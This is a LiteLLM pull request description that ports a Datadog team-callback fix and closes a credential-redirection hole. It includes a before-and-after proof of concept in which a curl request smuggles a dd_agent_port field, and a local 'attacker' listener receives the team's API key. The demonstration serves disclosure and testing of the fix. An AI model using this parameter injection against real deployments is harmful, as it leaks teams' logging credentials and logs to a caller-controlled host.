+    assert TRUSTED_CALLBACK_VARS_FIELD not in non_default
+    assert non_default["some_provider_param"] == "kept"


### PR DESCRIPTION
## TLDR

Problem this solves:

- OSS fix #35115 never reached litellm_internal_staging
- Team-scoped Datadog credentials were silently dropped there
- That fix read dd_* from raw request kwargs, so a caller could redirect team logs

How it solves it:

- Cherry-picks the merged OSS commit onto internal staging
- Stamps team callback_vars into a proxy-owned trusted field
- Strips caller-supplied dd_*/gcs_* from the body and every metadata slot

## Relevant issues

Ports #35115 (merged into litellm_oss_branch on Jul 30) into litellm_internal_staging. That PR fixed a bug in the team-scoped Datadog callback feature from #29947: dd_api_key and dd_site set by an admin via POST /team/{id}/callback were blocked by _request_blocked_callback_params, so DataDogLogger never received the team credentials

The other two commits unique to litellm_oss_branch (#29528 and #29947) already landed here through earlier OSS staging sync PRs, so this is the only missing change

The port then grew a second commit for a hole the review flagged in #35115 itself. Reading dd_* off the raw request kwargs meant a caller could pair its own dd_site / dd_agent_host / dd_agent_port with the team's admin-configured dd_api_key, and the proxy would ship that team's logs, with the team's Datadog credential in the DD-API-KEY header, to a host the caller chose. Team callback_vars only overwrite the keys the admin actually set, so any dd_* the admin left at its default was the caller's to fill in. Default deployments were shielded by the auth-layer banned-params check, which 400s dd_* in a request body; the exposure is deployments running `general_settings.allow_client_side_credentials: true` or a `configurable_clientside_auth_params` entry for a dd_ param

## Linear ticket

## Pre-Submission checklist

**Please complete all items before asking a LiteLLM maintainer to review your PR**

- [x] I have added meaningful tests
- [ ] My PR passes all CI/CD checks (e.g., lint, format, unit tests)
- [x] My PR's scope is as isolated as possible; it only solves 1 specific problem
- [ ] I have received a Greptile **Confidence Score of at least 4/5** before requesting a maintainer review (Greptile reviews automatically once the PR is opened; only comment `@greptileai` to re-request a review after pushing changes)

## Delays in PR merge?

If you're seeing a delay in your PR being merged, ping the LiteLLM Team on [Slack (#pr-review)](https://join.slack.com/t/litellmossslack/shared_invite/zt-3o7nkuyfr-p_kbNJj8taRfXGgQI1~YyA).

## Screenshots / Proof of Fix

Two proxies against the same database and the same team, one at the parent commit `2e663a36f0` (before) and one at `7ad8289142` (after), both started with `general_settings.allow_client_side_credentials: true` so the request-body dd_ params get past the auth-layer ban. Requests hit Groq for real (llama-3.3-70b-versatile, real tokens billed). Two local HTTP listeners stand in for Datadog intakes because no Datadog account is available in this environment: `:10518` is the default agent port the team's `dd_agent_host` resolves to, `:4992` is the caller-controlled one. Each listener prints the bytes it received and the DD-API-KEY header it was handed

Setup, run once against either proxy:

```bash
curl -s -X POST http://127.0.0.1:4477/team/new -H 'Authorization: Bearer sk-dd-qa-1234' \
  -H 'Content-Type: application/json' -d '{"team_alias":"dd-qa-team-2","models":["groq-llama"]}'

curl -s -X POST "http://127.0.0.1:4477/team/$TEAM/callback" -H 'Authorization: Bearer sk-dd-qa-1234' \
  -H 'Content-Type: application/json' \
  -d '{"callback_name":"datadog","callback_type":"success","callback_vars":{"dd_api_key":"TEAM-DD-SECRET-KEY","dd_agent_host":"127.0.0.1"}}'

curl -s -X POST http://127.0.0.1:4477/key/generate -H 'Authorization: Bearer sk-dd-qa-1234' \
  -H 'Content-Type: application/json' -d "{\"team_id\":\"$TEAM\",\"models\":[\"groq-llama\"]}"
```

Before, at `2e663a36f0`; the caller adds one field to an ordinary chat completion and the team's Datadog key walks out with the logs:

```bash
$ curl -s -X POST http://127.0.0.1:4478/v1/chat/completions -H "Authorization: Bearer $TEAM_KEY" \
    -H 'Content-Type: application/json' \
    -d '{"model":"groq-llama","messages":[{"role":"user","content":"say ok"}],"max_tokens":5,"dd_agent_port":"4992"}' \
    -o /dev/null -w "http:%{http_code}\n"
http:200

$ cat sink_team10518.log
                       <- empty, the team's own intake got nothing

$ cat sink_attacker.log
[ATTACKER-INTAKE] RECEIVED 2668 bytes on /api/v2/logs, dd-api-key header=TEAM-DD-SECRET-KEY
```

After, at `7ad8289142`, same team, same key, same body:

```bash
$ curl -s -X POST http://127.0.0.1:4477/v1/chat/completions -H "Authorization: Bearer $TEAM_KEY" \
    -H 'Content-Type: application/json' \
    -d '{"model":"groq-llama","messages":[{"role":"user","content":"say ok"}],"max_tokens":5,"dd_agent_port":"4992"}'
{"choices":[{"message":{"content":"Ok"}}],"usage":{"total_tokens":39}}

$ cat sink_team10518.log
[TEAM-INTAKE] RECEIVED 2671 bytes on /api/v2/logs, dd-api-key header=TEAM-DD-SECRET-KEY

$ cat sink_attacker.log
                       <- empty, the injected destination is ignored
```

The team callback itself still works, which is the behavior #35115 restored. Same proxy at `7ad8289142`, no injected field:

```bash
$ curl -s -X POST http://127.0.0.1:4477/v1/chat/completions -H "Authorization: Bearer $TEAM_KEY" \
    -H 'Content-Type: application/json' \
    -d '{"model":"groq-llama","messages":[{"role":"user","content":"say ok"}],"max_tokens":5}'
{"choices":[{"message":{"content":"ok"}}],"usage":{"total_tokens":39}}

$ cat sink_team10518.log
[TEAM-INTAKE] RECEIVED 2671 bytes on /api/v2/logs, dd-api-key header=TEAM-DD-SECRET-KEY
```

For deployments on the default settings the request never gets that far, which is why this is a hardening fix rather than a break-glass one. Same build at `7ad8289142` with `allow_client_side_credentials` removed from the config:

```bash
$ curl -s -X POST http://127.0.0.1:4479/v1/chat/completions -H "Authorization: Bearer $TEAM_KEY" \
    -H 'Content-Type: application/json' \
    -d '{"model":"groq-llama","messages":[{"role":"user","content":"say ok"}],"max_tokens":5,"dd_agent_port":"4992"}'
{"error":{"message":"Authentication Error, Rejected Request: dd_agent_port is not allowed in request body. Clientside passthrough requires explicit admin opt-in via either `general_settings.allow_client_side_credentials = true` (proxy-wide) or `configurable_clientside_auth_params` on the deployment in your proxy config.yaml. ..."}}
```

## Type

🐛 Bug Fix

## Changes

Cherry-pick of a5164fe210, minus its key-level strip. That commit also filtered _request_blocked_callback_params out of key-level callback_vars, which silently broke key-based GCS logging; tests/proxy_unit_tests/test_proxy_server.py::test_add_callback_via_key_litellm_pre_call_utils_gcs_bucket asserts gcs_bucket_name and gcs_path_service_account reach the request, and it was red in CI. The guard is redundant under the design below: key callback settings replace team settings rather than merging with them, so a key's vars can never pair with a team's credential, and DataDogHandler already refuses the env DD_API_KEY whenever a caller-named destination is present. The cherry-pick also dropped a now-unused DatadogLoggingConfig import in the test file that ruff flagged after merging with this branch's version

The main commit replaces the raw-kwargs read. add_litellm_data_to_request now stamps team and key callback_vars into `litellm_trusted_callback_vars`, a proxy-owned field, alongside the existing top-level unpack that langfuse and friends read. _strip_client_callback_credentials removes _request_blocked_callback_params, and any caller-forged copy of the trusted field, from the request body and from metadata, litellm_metadata and litellm_params.metadata; it runs after the metadata string-to-dict parse so JSON-string metadata cannot smuggle values past the isinstance guard. Logging keeps only the trusted mapping and resolves dd_* from it, so pass-through and other routes that build Logging without proxy data get nothing rather than caller input

Logging stores the trusted vars as a tuple of pairs rather than a mapping. The proxy deep-copies request data and the Logging object rides along in it, so a mappingproxy attribute raises "cannot pickle 'mappingproxy' object"; CI caught that in test_common_request_processing.py and tests/test_litellm/integrations/datadog/test_datadog_team_handler.py::TestTeamCallbackFlowPassesDDCredentials::test_logging_object_stays_deepcopyable now pins it

`litellm_trusted_callback_vars` is registered in all_litellm_params. Without that the OpenAI param builder sweeps the unrecognized top-level key into extra_body and every provider call fails; Groq answers "property 'litellm_trusted_callback_vars' is unsupported". Live QA caught it, and tests/test_litellm/proxy/test_litellm_pre_call_utils.py::test_trusted_callback_vars_never_reach_the_provider pins it

Behavior note for reviewers: dd_* and gcs_* supplied in a request body are now dropped even when allow_client_side_credentials is on. Nothing shipped ever honored them, since initialize_standard_callback_dynamic_params has always skipped _request_blocked_callback_params; the only build where they took effect is the unreleased #35115 code this PR is replacing

### Final Attestation

- [x] The tests check the right things, including the edge cases, and regressions in the respective real-world customer use-cases are not possible after this PR
